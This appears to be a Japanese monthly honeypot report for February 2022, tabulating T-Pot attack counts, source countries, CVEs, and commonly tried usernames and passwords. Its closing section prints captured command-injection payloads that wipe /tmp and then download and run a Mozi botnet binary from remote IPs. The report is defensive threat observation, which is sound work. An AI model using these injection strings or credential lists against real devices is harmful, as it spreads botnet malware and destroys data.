ハニーポット運用(月次報告:2022年2月)
今月のTopics
ロシアによるウクライナへの軍事侵攻が2/24(木)から開始された。
タイムズ紙によるとロシアによるウクライナ侵攻の直前に、中国がウクライナに大規模なサイバー攻撃を仕掛けていたとの報道もあり中国がロシアの侵攻を事前に織り込んでいたことが示唆されている。
www.thetimes.co.uk
戦争の激化に伴い、ウクライナ侵攻に関連するアクセスもより活発になることが予想される。一刻も早い戦争終結を祈るばかりである。
www3.nhk.or.jp
T-Potにて1か月運用した結果を記載する。
今月のChangelog
・今月は無し。 ※CHANGELOG.mdを参照していたがメンテされないため、Commitsログを参考にする。
前提条件
運用日時:2022年2月1日-2022年2月28日
運用期間:28日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Cowrie | 1,414,228 | - |
| 2 | Honeytrap | 860,428 | - |
| 3 | Heralding | 726,797 | - |
| 4 | Dionaea | 315,661 | - |
| 5 | Rdpy | 123,447 | - |
| 6 | Adbhoney | 16,215 | - |
| 7 | Mailoney | 9,890 | - |
| 8 | Tanner | 5,374 | - |
| 9 | Ciscoasa | 1,986 | - |
| 10 | ConPot | 1,861 | - |
| 11 | CitrixHoneypot | 1,783 | - |
| 12 | ElasticPot | 834 | - |
| 13 | Medpot | 327 | - |
| 14 | Dicompot | 71 | - |
| 15 | Honeysap | 37 | - |
- Result
- 先月はデータ消去事故が発生したため、先月比の比較は無し。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Russia | 774,646 | - |
| 2 | Netherlands | 429,214 | - |
| 3 | United States | 420,509 | - |
| 4 | China | 412,076 | - |
| 5 | Japan | 116,656 | - |
| 6 | Vietnam | 95,508 | - |
| 7 | India | 75,679 | - |
| 8 | Singapore | 63,631 | - |
| 9 | Poland | 61,354 | - |
| 10 | Spain | 53,663 | - |
| 11 | Denmark | 53,471 | - |
| 12 | Brazil | 49,195 | - |
| 13 | Germany | 48,984 | - |
| 14 | South Korea | 48,654 | - |
| 15 | United Kingdom | 43,466 | - |
| 16 | Hong Kong | 42,487 | - |
| 17 | Mexico | 34,838 | - |
| 18 | Indonesia | 33,494 | - |
| 19 | Ukraine | 27,543 | - |
| 20 | Sweden | 23,609 | - |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,479,040 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 480 |
| 3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 14 |
| 4 | CVE-2020-11910 | 3 |
- Result
- 新規の脆弱性は無し
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 105,222 |
| 2 | sa | 26,042 |
| 3 | nproc | 6,395 |
| 4 | user | 6,299 |
| 5 | admin | 5,469 |
| 6 | test | 2,014 |
| 7 | postgres | 1,830 |
| 8 | ubuntu | 1,542 |
| 9 | 22 | 1,182 |
| 10 | oracle | 926 |
| 11 | ftpuser | 753 |
| 12 | git | 708 |
| 13 | (empty) | 640 |
| 14 | !root | 599 |
| 15 | 2Wire | 592 |
| 16 | support | 586 |
| 17 | mysql | 481 |
| 18 | administrator | 465 |
| 19 | ftp | 454 |
| 20 | guest | 453 |
| 21 | www | 443 |
| 22 | web | 423 |
| 23 | testuser | 408 |
| 24 | deploy | 381 |
| 25 | info@mailrelay.local | 375 |
| 26 | user1 | 343 |
| 27 | adm | 339 |
| 28 | jenkins | 316 |
| 29 | 666666 | 306 |
| 30 | debug | 301 |
| 31 | minecraft | 301 |
| 32 | unknown | 300 |
| 33 | 0 | 293 |
| 34 | $ALOC$ | 287 |
| 35 | anonymous | 282 |
| 36 | blank | 276 |
| 37 | www-data | 275 |
| 38 | sales@mailrelay.local | 267 |
| 39 | server | 259 |
| 40 | test1 | 259 |
| 41 | hadoop | 258 |
| 42 | Admin | 256 |
| 43 | test@mailrelay.local | 252 |
| 44 | db | 248 |
| 45 | tomcat | 247 |
| 46 | dev | 243 |
| 47 | data | 237 |
| 48 | nagios | 236 |
| 49 | teamspeak | 234 |
| 50 | wwwroot | 231 |
- Result
- メールアドレスをユーザ名に指定したアクセスが幾つか確認された。 info@mailrelay.local(25位)、sales@mailrelay.local(38位)、test@mailrelay.local(43位)
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 10,159 |
| 2 | 123456 | 8,045 |
| 3 | nproc | 6,395 |
| 4 | 1 | 3,023 |
| 5 | 123 | 2,895 |
| 6 | password | 2,615 |
| 7 | (empty) | 1,849 |
| 8 | root | 1,800 |
| 9 | 1234 | 1,691 |
| 10 | user | 1,662 |
| 11 | 12345 | 1,610 |
| 12 | 12345678 | 1,033 |
| 13 | blank | 885 |
| 14 | test | 859 |
| 15 | 123456789 | 594 |
| 16 | 0 | 562 |
| 17 | 1q2w3e4r | 533 |
| 18 | 111111 | 525 |
| 19 | 123123 | 509 |
| 20 | qwerty | 509 |
| 21 | 666666 | 493 |
| 22 | 1qaz2wsx | 469 |
| 23 | abc123 | 391 |
| 24 | support | 387 |
| 25 | P@ssw0rd | 385 |
| 26 | ubnt | 376 |
| 27 | 00000000 | 371 |
| 28 | 1234567 | 371 |
| 29 | 123qwe | 359 |
| 30 | admin123 | 357 |
| 31 | master | 357 |
| 32 | test123 | 335 |
| 33 | Password | 333 |
| 34 | pass | 328 |
| 35 | p@ssw0rd | 325 |
| 36 | backup | 324 |
| 37 | alpine | 319 |
| 38 | 1234567890 | 313 |
| 39 | Passw0rd | 309 |
| 40 | unknown | 309 |
| 41 | synnet | 289 |
| 42 | hi3518 | 285 |
| 43 | !ishtar | 284 |
| 44 | password123 | 252 |
| 45 | passw0rd | 246 |
| 46 | q1w2e3r4 | 246 |
| 47 | 123321 | 229 |
| 48 | 1qaz@WSX | 228 |
| 49 | 000000 | 217 |
| 50 | passwd | 203 |
- Result
パスワードに関連した文字列が多かった
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
Peace is the best.
* shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
ASCII text, with CRLF line terminators /putkite/quickr1n.sh
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV) /1.txt
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV) /1a.txt
POSIX shell script, ASCII text executable /bins.sh
◆exeファイルに関するアクセス
PE32 executable (GUI) Intel 80386, for MS Windows exiles.exe
PE32 executable (GUI) Intel 80386, for MS Windows s.exe
PE32 executable (GUI) Intel 80386, for MS Windows smss.exe
◆jsファイルに関するアクセス
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/101.0.54.113:34156/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/103.217.123.245:35220/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.198.251.73:41927/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.201.207.222:59276/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/117.251.57.35:46227/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/118.232.97.242:54791/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/175.11.134.111:24485/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/185.181.43.55:39167/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
XML 1.0 document, ASCII text /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http:/192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
